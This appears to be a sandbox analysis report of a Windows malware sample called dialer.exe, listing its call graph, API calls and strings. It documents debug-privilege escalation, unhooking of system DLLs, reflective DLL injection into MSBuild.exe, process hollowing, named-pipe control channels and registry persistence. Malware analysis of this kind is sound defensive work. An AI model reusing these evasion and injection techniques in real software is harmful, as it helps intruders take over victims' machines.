                                                        execution_graph 522 140002524 523 140002531 522->523 524 140002539 522->524 525 1400010c0 30 API calls 523->525 525->524 383 140002bf8 384 140002c05 383->384 386 140002c25 ConnectNamedPipe 384->386 387 140002c1a Sleep 384->387 393 140001b54 AllocateAndInitializeSid 384->393 388 140002c83 Sleep 386->388 389 140002c34 ReadFile 386->389 387->384 391 140002c8e DisconnectNamedPipe 388->391 390 140002c57 WriteFile 389->390 389->391 390->391 391->386 394 140001bb1 SetEntriesInAclW 393->394 395 140001c6f 393->395 394->395 396 140001bf5 LocalAlloc 394->396 395->384 396->395 397 140001c09 InitializeSecurityDescriptor 396->397 397->395 398 140001c19 SetSecurityDescriptorDacl 397->398 398->395 399 140001c30 CreateNamedPipeW 398->399 399->395 400 140002258 403 14000226c 400->403 427 140001f2c 403->427 406 140001f2c 14 API calls 407 14000228f GetCurrentProcessId OpenProcess 406->407 408 140002321 FindResourceExA 407->408 409 1400022af OpenProcessToken 407->409 412 140002341 SizeofResource 408->412 413 140002261 ExitProcess 408->413 410 1400022c3 LookupPrivilegeValueW 409->410 411 140002318 CloseHandle 409->411 410->411 414 1400022da AdjustTokenPrivileges 410->414 411->408 412->413 415 14000235a LoadResource 412->415 414->411 416 140002312 GetLastError 414->416 415->413 417 14000236e LockResource GetCurrentProcessId 415->417 416->411 441 1400017ec GetProcessHeap HeapAlloc 417->441 419 14000238b RegCreateKeyExW 420 140002489 CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 419->420 421 1400023cc ConvertStringSecurityDescriptorToSecurityDescriptorW 419->421 422 14000250f SleepEx 420->422 423 1400023f4 RegSetKeySecurity LocalFree 421->423 424 14000240e RegCreateKeyExW 421->424 422->422 423->424 425 140002448 GetCurrentProcessId RegSetValueExW RegCloseKey 424->425 426 14000247f RegCloseKey 424->426 425->426 426->420 428 140001f35 StrCpyW StrCatW GetModuleHandleW 427->428 429 1400020ff 427->429 428->429 430 140001f86 GetCurrentProcess K32GetModuleInformation 428->430 429->406 431 1400020f6 FreeLibrary 430->431 432 140001fb6 CreateFileW 430->432 431->429 432->431 433 140001feb CreateFileMappingW 432->433 434 140002014 MapViewOfFile 433->434 435 1400020ed CloseHandle 433->435 436 1400020e4 CloseHandle 434->436 437 140002037 434->437 435->431 436->435 437->436 438 140002050 lstrcmpiA 437->438 440 14000208e 437->440 438->437 439 140002090 VirtualProtect VirtualProtect 438->439 439->436 440->436 447 1400014d8 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 441->447 443 140001885 GetProcessHeap HeapFree 444 140001830 444->443 445 140001851 OpenProcess 444->445 445->444 446 140001867 TerminateProcess CloseHandle 445->446 446->444 448 140001565 447->448 449 14000162f GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 447->449 448->449 450 14000157a OpenProcess 448->450 452 14000161a CloseHandle 448->452 453 1400015c9 ReadProcessMemory 448->453 449->444 450->448 451 140001597 K32EnumProcessModules 450->451 451->448 451->452 452->448 453->448 454 140002b38 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 455 140002b8e K32EnumProcesses 454->455 456 140002beb Sleep 455->456 458 140002ba3 455->458 456->455 457 140002bdc 457->456 458->457 460 140002540 458->460 461 140002558 460->461 462 14000254d 460->462 461->458 464 1400010c0 462->464 502 1400018ac OpenProcess 464->502 467 1400014ba 467->461 468 140001122 OpenProcess 468->467 469 14000113e OpenProcess 468->469 470 140001161 K32GetModuleFileNameExW 469->470 471 1400011fd NtQueryInformationProcess 469->471 472 1400011aa CloseHandle 470->472 473 14000117a PathFindFileNameW lstrlenW 470->473 474 1400014b1 CloseHandle 471->474 475 140001224 471->475 472->471 477 1400011b8 472->477 473->472 476 140001197 StrCpyW 473->476 474->467 475->474 478 140001230 OpenProcessToken 475->478 476->472 477->471 479 1400011d8 StrCmpIW 477->479 478->474 480 14000124e GetTokenInformation 478->480 479->474 479->477 481 1400012f1 480->481 482 140001276 GetLastError 480->482 483 1400012f8 CloseHandle 481->483 482->481 484 140001281 LocalAlloc 482->484 483->474 489 14000130c 483->489 484->481 485 140001297 GetTokenInformation 484->485 486 1400012df 485->486 487 1400012bf GetSidSubAuthorityCount GetSidSubAuthority 485->487 488 1400012e6 LocalFree 486->488 487->488 488->483 489->474 490 14000139b StrStrA 489->490 491 1400013c3 489->491 490->489 492 1400013c8 490->492 491->474 492->474 493 1400013f3 VirtualAllocEx 492->493 493->474 494 140001420 WriteProcessMemory 493->494 494->474 495 14000143b 494->495 507 14000211c 495->507 497 14000145b 497->474 498 140001478 WaitForSingleObject 497->498 501 140001471 CloseHandle 497->501 500 140001487 GetExitCodeThread 498->500 498->501 500->501 501->474 503 14000110e 502->503 504 1400018d8 IsWow64Process 502->504 503->467 503->468 505 1400018f8 CloseHandle 504->505 506 1400018ea 504->506 505->503 506->505 510 140001914 GetModuleHandleA 507->510 511 140001934 GetProcAddress 510->511 512 14000193d 510->512 511->512 513 1400021d0 514 1400021dd 513->514 515 140001b54 6 API calls 514->515 516 1400021f2 Sleep 514->516 517 1400021fd ConnectNamedPipe 514->517 515->514 516->514 518 140002241 Sleep 517->518 519 14000220c ReadFile 517->519 520 14000224c DisconnectNamedPipe 518->520 519->520 521 14000222f 519->521 520->517 521->520 526 140002560 527 140002592 526->527 528 14000273a 526->528 529 1400026c6 GetProcessHeap HeapAlloc K32EnumProcesses 527->529 530 140002598 527->530 531 140002748 528->531 532 14000297e ReadFile 528->532 533 140002633 529->533 535 140002704 529->535 536 1400025a5 530->536 537 1400026bd ExitProcess 530->537 538 140002751 531->538 539 140002974 531->539 532->533 534 1400029a8 532->534 534->533 547 1400018ac 3 API calls 534->547 535->533 549 1400010c0 30 API calls 535->549 543 1400025ae 536->543 544 140002660 RegOpenKeyExW 536->544 540 140002919 538->540 541 14000275c 538->541 542 14000175c 22 API calls 539->542 548 140001944 ReadFile 540->548 545 140002761 541->545 546 14000279d 541->546 542->533 543->533 559 1400025cb ReadFile 543->559 550 1400026a1 544->550 551 14000268d RegDeleteValueW 544->551 545->533 608 14000217c 545->608 611 140001944 546->611 552 1400029c7 547->552 554 140002928 548->554 549->535 595 1400019c4 SysAllocString SysAllocString CoInitializeEx 550->595 551->550 552->533 563 1400029db GetProcessHeap HeapAlloc 552->563 564 140002638 552->564 554->533 566 140001944 ReadFile 554->566 558 1400026a6 603 14000175c GetProcessHeap HeapAlloc 558->603 559->533 561 1400025f5 559->561 561->533 573 1400018ac 3 API calls 561->573 569 1400014d8 13 API calls 563->569 575 140002a90 4 API calls 564->575 565 1400027b4 ReadFile 565->533 570 1400027dc 565->570 571 14000293f 566->571 586 140002a14 569->586 570->533 576 1400027e9 GetProcessHeap HeapAlloc ReadFile 570->576 571->533 577 140002947 ShellExecuteW 571->577 579 140002614 573->579 575->533 581 14000290b GetProcessHeap 576->581 582 14000282d 576->582 577->533 579->533 579->564 585 140002624 579->585 580 140002a49 GetProcessHeap 583 140002a52 HeapFree 580->583 581->583 582->581 587 140002881 lstrlenW GetProcessHeap HeapAlloc 582->587 588 14000285e 582->588 583->533 589 1400010c0 30 API calls 585->589 586->580 635 1400016cc 586->635 629 140002a90 CreateFileW 587->629 588->581 615 140001c88 588->615 589->533 596 140001a11 CoInitializeSecurity 595->596 597 140001b2c SysFreeString SysFreeString 595->597 598 140001a59 CoCreateInstance 596->598 599 140001a4d 596->599 597->558 600 140001b26 CoUninitialize 598->600 601 140001a88 VariantInit 598->601 599->598 599->600 600->597 602 140001ade 601->602 602->600 604 1400014d8 13 API calls 603->604 606 14000179a 604->606 605 1400017c8 GetProcessHeap HeapFree 606->605 607 1400016cc 5 API calls 606->607 607->606 609 140001914 2 API calls 608->609 610 140002191 609->610 612 140001968 ReadFile 611->612 613 14000198b 612->613 614 1400019a5 612->614 613->612 613->614 614->533 614->565 616 140001cbb 615->616 617 140001cce CreateProcessW 616->617 619 140001e97 616->619 621 140001e62 OpenProcess 616->621 623 140001dd2 VirtualAlloc 616->623 625 140001d8c WriteProcessMemory 616->625 617->616 618 140001d2b VirtualAllocEx 617->618 618->616 620 140001d60 WriteProcessMemory 618->620 619->581 620->616 621->616 622 140001e78 TerminateProcess 621->622 622->616 623->616 624 140001df1 GetThreadContext 623->624 624->616 626 140001e09 WriteProcessMemory 624->626 625->616 626->616 627 140001e30 SetThreadContext 626->627 627->616 628 140001e4e ResumeThread 627->628 628->616 628->619 630 1400028f7 GetProcessHeap HeapFree 629->630 631 140002ada WriteFile 629->631 630->581 632 140002b1c CloseHandle 631->632 633 140002afe 631->633 632->630 633->632 634 140002b02 WriteFile 633->634 634->632 636 140001745 635->636 637 1400016eb OpenProcess 635->637 636->580 637->636 638 140001703 637->638 639 14000211c 2 API calls 638->639 640 140001723 639->640 641 14000173c CloseHandle 640->641 642 140001731 CloseHandle 640->642 641->636 642->641

                                                        Callgraph

                                                        Executed Functions

                                                        Function 000000014000226C Relevance: 61.4, APIs: 27, Strings: 8, Instructions: 165registrymemorythreadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.1572740595.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000019.00000002.1572708660.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000019.00000002.1572776902.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000019.00000002.1572816213.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                        • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                        • API String ID: 4177739653-1130149537
                                                        • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                        • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                                                        • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                        • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740
                                                        Function 00000001400010C0 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 257memorystringnativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 24 1400010c0-140001110 call 1400018ac 27 140001116-14000111c 24->27 28 1400014ba-1400014d6 24->28 27->28 29 140001122-140001138 OpenProcess 27->29 29->28 30 14000113e-14000115b OpenProcess 29->30 31 140001161-140001178 K32GetModuleFileNameExW 30->31 32 1400011fd-14000121e NtQueryInformationProcess 30->32 33 1400011aa-1400011b6 CloseHandle 31->33 34 14000117a-140001195 PathFindFileNameW lstrlenW 31->34 35 1400014b1-1400014b4 CloseHandle 32->35 36 140001224-14000122a 32->36 33->32 38 1400011b8-1400011d3 33->38 34->33 37 140001197-1400011a7 StrCpyW 34->37 35->28 36->35 39 140001230-140001248 OpenProcessToken 36->39 37->33 40 1400011d8-1400011ea StrCmpIW 38->40 39->35 41 14000124e-140001274 GetTokenInformation 39->41 40->35 42 1400011f0-1400011fb 40->42 43 1400012f1 41->43 44 140001276-14000127f GetLastError 41->44 42->32 42->40 45 1400012f8-140001306 CloseHandle 43->45 44->43 46 140001281-140001295 LocalAlloc 44->46 45->35 47 14000130c-140001313 45->47 46->43 48 140001297-1400012bd GetTokenInformation 46->48 47->35 51 140001319-140001324 47->51 49 1400012df 48->49 50 1400012bf-1400012dd GetSidSubAuthorityCount GetSidSubAuthority 48->50 52 1400012e6-1400012ef LocalFree 49->52 50->52 51->35 53 14000132a-140001334 51->53 52->45 53->35 54 14000133a-140001344 53->54 54->35 55 14000134a-14000138a call 140001ec4 * 3 54->55 55->35 62 140001390-1400013b0 call 140001ec4 StrStrA 55->62 65 1400013b2-1400013c1 62->65 66 1400013c8-1400013ed call 140001ec4 * 2 62->66 65->62 67 1400013c3 65->67 66->35 72 1400013f3-14000141a VirtualAllocEx 66->72 67->35 72->35 73 140001420-140001439 WriteProcessMemory 72->73 73->35 74 14000143b-14000145d call 14000211c 73->74 74->35 77 14000145f-140001467 74->77 77->35 78 140001469-14000146f 77->78 79 140001471-140001476 78->79 80 140001478-140001485 WaitForSingleObject 78->80 81 1400014ab CloseHandle 79->81 82 1400014a6 80->82 83 140001487-14000149b GetExitCodeThread 80->83 81->35 82->81 83->82 84 14000149d-1400014a3 83->84 84->82
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.1572740595.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000019.00000002.1572708660.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000019.00000002.1572776902.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000019.00000002.1572816213.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                        • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                                                        • API String ID: 2561231171-3753927220
                                                        • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                        • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                                                        • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                        • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740
                                                        Function 00000001400014D8 Relevance: 19.6, APIs: 13, Instructions: 130memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.1572740595.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000019.00000002.1572708660.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000019.00000002.1572776902.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000019.00000002.1572816213.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                        • String ID:
                                                        • API String ID: 4084875642-0
                                                        • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                        • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                                                        • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                        • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700
                                                        Function 0000000140001B54 Relevance: 9.1, APIs: 6, Instructions: 82memorypipeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.1572740595.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000019.00000002.1572708660.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000019.00000002.1572776902.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000019.00000002.1572816213.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                        • String ID:
                                                        • API String ID: 3197395349-0
                                                        • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                        • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                                                        • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                        • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40
                                                        Function 00000001400017EC Relevance: 9.1, APIs: 6, Instructions: 55memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                                                        • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                                                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                                                          • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                                                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                                                          • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                                                          • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                                                          • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                                                          • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                                                          • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                                                          • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                                                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                                                          • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 000000014000163D
                                                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                                                          • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 0000000140001651
                                                        • OpenProcess.KERNEL32 ref: 0000000140001859
                                                        • TerminateProcess.KERNEL32 ref: 000000014000186C
                                                        • CloseHandle.KERNEL32 ref: 0000000140001875
                                                        • GetProcessHeap.KERNEL32 ref: 0000000140001885
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.1572740595.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000019.00000002.1572708660.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000019.00000002.1572776902.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000019.00000002.1572816213.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                        • String ID:
                                                        • API String ID: 1323846700-0
                                                        • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                        • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                                                        • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                        • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700
                                                        Function 0000000140001F2C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124filememorystringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.1572740595.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000019.00000002.1572708660.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000019.00000002.1572776902.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000019.00000002.1572816213.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                        • String ID: .text$C:\Windows\System32\
                                                        • API String ID: 2721474350-832442975
                                                        • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                        • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                                                        • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                        • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700
                                                        Function 0000000140002BF8 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40sleepfilepipeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.1572740595.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000019.00000002.1572708660.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000019.00000002.1572776902.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000019.00000002.1572816213.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                        • String ID: M$\\.\pipe\dialerchildproc64
                                                        • API String ID: 2203880229-3489460547
                                                        • Opcode ID: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                        • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                                                        • Opcode Fuzzy Hash: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                        • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700
                                                        Function 00000001400021D0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36sleeppipefileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 128 1400021d0-1400021da 129 1400021dd-1400021f0 call 140001b54 128->129 132 1400021f2-1400021fb Sleep 129->132 133 1400021fd-14000220a ConnectNamedPipe 129->133 132->129 134 140002241-140002246 Sleep 133->134 135 14000220c-14000222d ReadFile 133->135 136 14000224c-140002255 DisconnectNamedPipe 134->136 135->136 137 14000222f-140002234 135->137 136->133 137->136 138 140002236-14000223f 137->138 138->136
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.1572740595.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000019.00000002.1572708660.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000019.00000002.1572776902.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000019.00000002.1572816213.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                        • String ID: \\.\pipe\dialercontrol_redirect64
                                                        • API String ID: 2071455217-3440882674
                                                        • Opcode ID: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                        • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                                                        • Opcode Fuzzy Hash: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                        • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700
                                                        Function 0000000140002B38 Relevance: 9.1, APIs: 6, Instructions: 58memorysleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 148 140002b38-140002b8c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 149 140002b8e-140002ba1 K32EnumProcesses 148->149 150 140002ba3-140002bb2 149->150 151 140002beb-140002bf4 Sleep 149->151 152 140002bb4-140002bb8 150->152 153 140002bdc-140002be7 150->153 151->149 154 140002bba 152->154 155 140002bcb-140002bce call 140002540 152->155 153->151 156 140002bbe-140002bc3 154->156 159 140002bd2 155->159 157 140002bc5-140002bc9 156->157 158 140002bd6-140002bda 156->158 157->155 157->156 158->152 158->153 159->158
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.1572740595.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000019.00000002.1572708660.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000019.00000002.1572776902.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000019.00000002.1572816213.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                        • String ID:
                                                        • API String ID: 3676546796-0
                                                        • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                        • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                                                        • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                        • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40
                                                        Function 00000001400018AC Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 172 1400018ac-1400018d6 OpenProcess 173 140001901-140001912 172->173 174 1400018d8-1400018e8 IsWow64Process 172->174 175 1400018f8-1400018fb CloseHandle 174->175 176 1400018ea-1400018f3 174->176 175->173 176->175
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.1572740595.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000019.00000002.1572708660.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000019.00000002.1572776902.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000019.00000002.1572816213.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseHandleOpenWow64
                                                        • String ID:
                                                        • API String ID: 10462204-0
                                                        • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                        • Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
                                                        • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                        • Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700
                                                        Function 0000000140002258 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 177 140002258-14000225c call 14000226c 179 140002261-140002263 ExitProcess 177->179
                                                        APIs
                                                          • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                                                          • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
